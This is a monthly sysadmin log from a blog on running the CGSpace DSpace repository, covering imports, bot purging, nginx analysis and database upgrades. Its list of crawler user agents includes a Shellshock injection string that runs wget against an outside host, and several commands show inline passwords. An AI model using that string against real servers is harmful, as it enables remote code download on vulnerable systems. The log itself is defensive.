<!DOCTYPE html>
< html lang = "en" >
< head >
< meta charset = "utf-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, shrink-to-fit=no" >
< meta property = "og:title" content = "March, 2022" / >
< meta property = "og:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p ' fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
< meta property = "og:type" content = "article" / >
< meta property = "og:url" content = "https://alanorth.github.io/cgspace-notes/2022-03/" / >
< meta property = "article:published_time" content = "2022-03-01T16:46:54+03:00" / >
< meta property = "article:modified_time" content = "2022-06-09T09:41:49+03:00" / >
< meta name = "twitter:card" content = "summary" / >
< meta name = "twitter:title" content = "March, 2022" / >
< meta name = "twitter:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p ' fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
< meta name = "generator" content = "Hugo 0.111.3" >
< script type = "application/ld+json" >
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
"wordCount": "1836",
"datePublished": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-06-09T09:41:49+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
},
"keywords": "Notes"
}
< / script >
< link rel = "canonical" href = "https://alanorth.github.io/cgspace-notes/2022-03/" >
< title > March, 2022 | CGSpace Notes< / title >
<!-- combined, minified CSS -->
< link href = "https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel = "stylesheet" integrity = "sha256-xrqAvFBmlVdkWr4F+GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin = "anonymous" >
<!-- minified Font Awesome for SVG icons -->
< script defer src = "https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity = "sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz+lcnA=" crossorigin = "anonymous" > < / script >
<!-- RSS 2.0 feed -->
< / head >
< body >
< div class = "blog-masthead" >
< div class = "container" >
< nav class = "nav blog-nav" >
< a class = "nav-link " href = "https://alanorth.github.io/cgspace-notes/" > Home< / a >
< / nav >
< / div >
< / div >
< header class = "blog-header" >
< div class = "container" >
< h1 class = "blog-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/" rel = "home" > CGSpace Notes< / a > < / h1 >
< p class = "lead blog-description" dir = "auto" > Documenting day-to-day work on the < a href = "https://cgspace.cgiar.org" > CGSpace< / a > repository.< / p >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div class = "col-sm-8 blog-main" >
< article class = "blog-post" >
< header >
< h2 class = "blog-post-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/2022-03/" > March, 2022< / a > < / h2 >
< p class = "blog-post-meta" >
< time datetime = "2022-03-01T16:46:54+03:00" > Tue Mar 01, 2022< / time >
in
< span class = "fas fa-folder" aria-hidden = "true" > < / span > < a href = "/categories/notes/" rel = "category tag" > Notes< / a >
< / p >
< / header >
< h2 id = "2022-03-01" > 2022-03-01< / h2 >
< ul >
< li > Send Gaia the last batch of potential duplicates for items 701 to 980:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
< / span > < / span > < span style = "display:flex;" > < span > $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p < span style = "color:#e6db74" > ' fuuu' < / span > -o /tmp/2022-03-01-tac-batch4-701-980.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-04" > 2022-03-04< / h2 >
< ul >
< li > Looking over the CGSpace Solr statistics from 2022-02
< ul >
< li > I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!< / li >
< li > Here are some of the more prevalent or weird ones:
< ul >
< li > axios/0.21.1< / li >
< li > Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)< / li >
< li > Nutraspace/Nutch-1.2 (< a href = "https://www.nutraspace.com" > www.nutraspace.com< / a > )< / li >
< li > Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; < a href = "mailto:webmaster@moreover.com" > webmaster@moreover.com< / a > )< / li >
< li > Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com< / li >
< li > Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)< / li >
< li > Crowsnest/0.5 (+http://www.crowsnest.tv/)< / li >
< li > Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com< / li >
< li > metha/0.2.27< / li >
< li > ZaloPC-win32-24v454< / li >
< li > Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x< / li >
< li > ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)< / li >
< li > FullStoryBot/1.0 (+https://www.fullstory.com)< / li >
< li > Link Validity Check From: < a href = "http://www.usgs.gov" > http://www.usgs.gov< / a > < / li >
< li > OSPScraper (+https://www.opensyllabusproject.org)< / li >
< li > () { :;}; /bin/bash -c " wget -O /tmp/bbb < a href = "https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832" > www.redel.net.br/1.php?id=3137382e37392e3138372e313832< / a > " < / li >
< / ul >
< / li >
< li > I submitted < a href = "https://github.com/atmire/COUNTER-Robots/pull/52" > a pull request to COUNTER-Robots< / a > with some of these< / li >
< / ul >
< / li >
< li > I purged a bunch of hits from the stats using the < code > check-spider-hits.sh< / code > script:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
< / span > < / span > < span style = "display:flex;" > < span > Purging 6 hits from scalaj-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 5 hits from lua-resty-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 9 hits from AHC in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 7 hits from acebookexternalhit in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1011 hits from axios\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2216 hits from Faveeo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1164 hits from Moreover\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 740 hits from Exploratodo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 585 hits from GroupHigh\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 438 hits from Crowsnest\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1326 hits from nbertaupete95 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 182 hits from metha\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 68 hits from ZaloPC-win32-24v454 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1644 hits from Firefox\/x\.x in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 678 hits from ZoteroTranslationServer in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 27 hits from FullStoryBot in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from Link Validity Check in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from OSPScraper in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1 hits from 3137382e37392e3138372e313832 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2755 hits from Nutch-[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" >
< / span > < / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" > < / span > Total number of bot hits purged: 12914
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project< / li >
< / ul >
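< p > The names in the purge output above are regular expressions that are matched against the user agent string. The following is a minimal sketch of that matching in Python, not the logic of < code > check-spider-hits.sh< / code > itself (which works against Solr and is not reproduced here). The pattern list is a subset copied from the output above, the helper name < code > count_bot_hits< / code > is hypothetical, and the last sample agent is a made-up ordinary browser added for contrast.< / p >

```python
import re
from collections import Counter

# Subset of the agent patterns shown in the purge output above.
PATTERNS = [
    r"axios\/[0-9]",
    r"Faveeo\/[0-9]",
    r"metha\/[0-9]",
    r"Firefox\/x\.x",
    r"Nutch-[0-9]",
]


def count_bot_hits(user_agents, patterns=PATTERNS):
    """Count how many user agents match each pattern (hypothetical helper)."""
    compiled = [(pattern, re.compile(pattern)) for pattern in patterns]
    hits = Counter()
    for agent in user_agents:
        for pattern, regex in compiled:
            if regex.search(agent):
                hits[pattern] += 1
                break  # attribute each agent to the first matching pattern only
    return hits


sample_agents = [
    "axios/0.21.1",
    "Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)",
    "Nutraspace/Nutch-1.2 (www.nutraspace.com)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x",
    # Hypothetical regular browser, which should not match any pattern.
    "Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
]

hits = count_bot_hits(sample_agents)
for pattern, count in hits.items():
    print(f"{count} hits from {pattern}")
```

< p > Note that < code > Firefox\/x\.x< / code > only catches the literal placeholder version string, so a real Firefox user agent is left alone.< / p >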
< h2 id = "2022-03-05" > 2022-03-05< / h2 >
< ul >
< li > Start AReS harvest< / li >
< / ul >
< h2 id = "2022-03-10" > 2022-03-10< / h2 >
< ul >
< li > A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
< ul >
< li > I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:< / li >
< / ul >
< / li >
< / ul >
< pre tabindex = "0" > < code > or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
< / code > < / pre > < ul >
< li > Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace import --add --eperson< span style = "color:#f92672" > =< / span > fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-10-tac-batch4-701to980.map
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-12" > 2022-03-12< / h2 >
< ul >
< li > Update all containers and rebuild OpenRXV on linode20:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ docker images | grep -v ^REPO | sed < span style = "color:#e6db74" > ' s/ \+/:/g' < / span > | cut -d: -f1,2 | xargs -L1 docker pull
< / span > < / span > < span style = "display:flex;" > < span > $ docker-compose build
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Then run all system updates and reboot< / li >
< li > Start a full harvest on AReS< / li >
< / ul >
< h2 id = "2022-03-16" > 2022-03-16< / h2 >
< ul >
< li > Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
< ul >
< li > We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing< / li >
< / ul >
< / li >
< / ul >
< h2 id = "2022-03-20" > 2022-03-20< / h2 >
< ul >
< li > Start a full harvest on AReS< / li >
< / ul >
< h2 id = "2022-03-21" > 2022-03-21< / h2 >
< ul >
< li > Review a few submissions for Open Repositories 2022< / li >
< li > Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed< / li >
< / ul >
< h2 id = "2022-03-22" > 2022-03-22< / h2 >
< ul >
< li > I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
< ul >
< li > I had been meaning to update my local database… < / li >
< / ul >
< / li >
< li > I re-imported the CGIAR CAS documents to < a href = "https://dspacetest.cgiar.org/handle/10568/118432" > DSpace Test< / a > and generated the PDF thumbnails:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace import --add --eperson< span style = "color:#f92672" > =< / span > fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-22-tac-700.map
< / span > < / span > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace filter-media -p < span style = "color:#e6db74" > " ImageMagick PDF Thumbnail" < / span > -i 10568/118432
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > On my local environment I decided to run the < code > check-duplicates.py< / code > script one more time with all 700 items:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
< / span > < / span > < span style = "display:flex;" > < span > $ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p < span style = "color:#e6db74" > ' dom@in34sniper' < / span > -o /tmp/2022-03-22-tac-duplicates.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I sent the resulting 76 items to Gaia to check< / li >
< li > UptimeRobot said that CGSpace was down
< ul >
< li > I looked and found many locks belonging to the REST API application:< / li >
< / ul >
< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ psql -c < span style = "color:#e6db74" > 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' < / span > | grep -o -E < span style = "color:#e6db74" > '(dspaceWeb|dspaceApi)' < / span > | sort | uniq -c | sort -n
< / span > < / span > < span style = "display:flex;" > < span > 301 dspaceWeb
< / span > < / span > < span style = "display:flex;" > < span > 2390 dspaceApi
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Looking at nginx’s logs, I found the top addresses making requests today:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > # awk < span style = "color:#e6db74" > ' {print $1}' < / span > /var/log/nginx/rest.log | sort | uniq -c | sort -h
< / span > < / span > < span style = "display:flex;" > < span > 1977 45.5.184.2
< / span > < / span > < span style = "display:flex;" > < span > 3167 70.32.90.172
< / span > < / span > < span style = "display:flex;" > < span > 4754 54.195.118.125
< / span > < / span > < span style = "display:flex;" > < span > 5411 205.186.128.185
< / span > < / span > < span style = "display:flex;" > < span > 6826 137.184.159.211
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > 137.184.159.211 is on DigitalOcean using this user agent: < code > GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28< / code >
< ul >
< li > I blocked this IP in nginx and the load went down immediately< / li >
< / ul >
< / li >
< li > 205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot< / li >
< li > 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)< / li >
< li > 70.32.90.172 is on Media Temple and has no user agent< / li >
< li > What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
< ul >
< li > I verified it works as expected with an empty user agent:< / li >
< / ul >
< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ curl -H User-Agent:< span style = "color:#e6db74" > ''< / span > < span style = "color:#e6db74" > 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'< / span >
< / span > < / span > < span style = "display:flex;" > < span > Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I note that the nginx log shows ‘-’ for a request with an empty user agent, which makes it indistinguishable from a request that sends a literal ‘-’ as its user agent. For example, these requests were successful:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > 70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
< / span > < / span > < span style = "display:flex;" > < span > 70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too< / li >
< li > Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that< / li >
< / ul >
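< p > To see how many successful requests arrived with a ‘-’ user agent, and from which addresses, the access log can be parsed directly. This is a minimal sketch that assumes nginx’s default “combined” log format, as in the two lines quoted above. The function name < code > dash_agent_successes< / code > is hypothetical, and the third sample line is invented for contrast rather than taken from the real log.< / p >

```python
import re
from collections import Counter

# Assumes nginx's default "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def dash_agent_successes(lines):
    """Count HTTP 200 responses per client IP where the logged user agent is '-'."""
    counts = Counter()
    for line in lines:
        match = LOG_RE.match(line)
        if match and match.group("agent") == "-" and match.group("status") == "200":
            counts[match.group("ip")] += 1
    return counts


sample = [
    '70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"',
    '70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"',
    # Hypothetical line: a blocked client that does send a user agent.
    '137.184.159.211 - - [22/Mar/2022:12:00:00 +0100] "GET /rest/items HTTP/1.1" 403 0 "-" "GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28"',
]

for ip, count in dash_agent_successes(sample).items():
    print(ip, count)
```

< p > The log alone cannot tell an empty user agent from a literal ‘-’, so this only counts what was logged. It does not show which of the two the client actually sent.< / p >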
< h2 id = "2022-03-24" > 2022-03-24< / h2 >
< ul >
< li > Maria from ABC asked about a reporting discrepancy on AReS
< ul >
< li > I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week< / li >
< / ul >
< / li >
< li > Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted
< ul >
< li > She asked if we can download them and upload them directly to CGSpace< / li >
< / ul >
< / li >
< li > I re-created my local Artifactory container< / li >
< li > I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
< ul >
< li > One thing I realized is that OAI is no longer a standalone web application, it is part of the < code > server< / code > app now: http://localhost:8080/server/oai/request?verb=Identify< / li >
< / ul >
< / li >
< li > Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active
< ul >
< li > I did this on DSpace Test in 2022-02 so I just followed the same procedure< / li >
< li > After that I ran all system updates and rebooted the server< / li >
< / ul >
< / li >
< / ul >
< h2 id = "2022-03-25" > 2022-03-25< / h2 >
< ul >
< li > Looking at the PostgreSQL database size on CGSpace after the update yesterday:< / li >
< / ul >
< p > < img src = "/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt = "PostgreSQL database size day" > < / p >
< ul >
< li > The space saving in indexes of recent PostgreSQL releases is awesome!< / li >
< li > Import a DSpace 6.x database dump from production into my local DSpace 7 database
< ul >
< li > I see I still get the same errors < a href = "/cgspace-notes/2021-04/" > I saw in 2021-04< / a > when testing DSpace 7.0 beta 5< / li >
< li > I had to delete some old migrations, as well as all Atmire ones first:< / li >
< / ul >
< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
< / span > < / span > < span style = "display:flex;" > < span > localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Then I was able to migrate to DSpace 7 with < code > dspace database migrate ignored< / code > as the < a href = "https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace" > DSpace upgrade notes say< / a >
< ul >
< li > I see that the < a href = "https://github.com/DSpace/dspace-angular/issues/1357" > flash of unstyled content bug< / a > still exists on dspace-angular… ouch!< / li >
< / ul >
< / li >
< li > Start a harvest on AReS< / li >
< / ul >
< h2 id = "2022-03-26" > 2022-03-26< / h2 >
< ul >
< li > Update dspace-statistics-api to Falcon 3.1.0 and < a href = "https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3" > release v1.4.3< / a > < / li >
< / ul >
< h2 id = "2022-03-28" > 2022-03-28< / h2 >
< ul >
< li > Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p < span style = "color:#e6db74" > ' fuuuuuuuu' < / span >
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection
< ul >
< li > According to my notes from < a href = "/cgspace-notes/2020-10/" > 2020-10< / a > the account must be in the admin group in order to submit via the REST API< / li >
< / ul >
< / li >
< li > Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”
< ul >
< li > We asked Peter and he said we should delete them< / li >
< li > I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them< / li >
< / ul >
< / li >
< li > I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
< ul >
< li > I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansible infrastructure playbooks< / li >
< / ul >
< / li >
< / ul >
< h2 id = "2022-03-29" > 2022-03-29< / h2 >
< ul >
< li > Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
< ul >
< li > I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:< / li >
< / ul >
< / li >
< / ul >
< pre tabindex = "0" > < code > or(
isNotNull(value.match('33')),
isNotNull(value.match('179')),
isNotNull(value.match('452')),
isNotNull(value.match('489')),
isNotNull(value.match('541')),
isNotNull(value.match('568')),
isNotNull(value.match('646')),
isNotNull(value.match('889'))
)
< / code > < / pre > < ul >
< li > Then I flagged all matching records, exported a CSV to use with SAFBuilder, imported the 692 items on CGSpace, and generated the thumbnails:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ export JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Dfile.encoding=UTF-8 -Xmx1024m" < / span >
< / span > < / span > < span style = "display:flex;" > < span > $ dspace import --add --eperson< span style = "color:#f92672" > =< / span > umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-29-cgiar-tac.map
< / span > < / span > < span style = "display:flex;" > < span > $ chrt -b < span style = "color:#ae81ff" > 0< / span > dspace filter-media -p < span style = "color:#e6db74" > " ImageMagick PDF Thumbnail" < / span > -i 10947/50
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > After that I did some normalization on the < code > cg.subject.system< / code > metadata and extracted a few dozen countries to the country field< / li >
< li > Start a harvest on AReS< / li >
< / ul >
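< p > The < code > or(...)< / code > GREL expression used for the “delete” facet in this entry and on 2022-03-10 follows a fixed pattern, so it can be generated from the list of IDs rather than typed by hand. This is a minimal sketch under that assumption. The helper < code > build_grel_or< / code > is hypothetical and is not part of OpenRefine or the ILRI scripts; the IDs are the eight from the expression above.< / p >

```python
def build_grel_or(ids):
    """Build an or(...) GREL expression with one value.match() clause per ID."""
    clauses = [f"isNotNull(value.match('{item_id}'))" for item_id in ids]
    return "or(\n" + ",\n".join(clauses) + "\n)"


# IDs flagged with the action "delete" in the final review above.
delete_ids = [33, 179, 452, 489, 541, 568, 646, 889]

expression = build_grel_or(delete_ids)
print(expression)
```

< p > The printed text can be pasted into the custom text facet dialog in OpenRefine.< / p >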
< h2 id = "2022-03-30" > 2022-03-30< / h2 >
< ul >
< li > Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p < span style = "color:#e6db74" > ' fuuuu' < / span >
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I started looking into the request regarding the CIAT Library PDFs
< ul >
< li > There are over 4,000 links to PDFs hosted on that server in CGSpace metadata< / li >
< li > The links seem to be down though! I emailed Paola to ask< / li >
< / ul >
< / li >
< / ul >
< h2 id = "2022-03-31" > 2022-03-31< / h2 >
< ul >
< li > Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC< / li >
< li > I will do the following for CMS and G1GC on DSpace Test:
< ul >
< li > Wait for startup< / li >
< li > Reload home page< / li >
< li > Log in< / li >
< li > Do a search for “livestock”< / li >
< li > Click AGROVOC facet for livestock< / li >
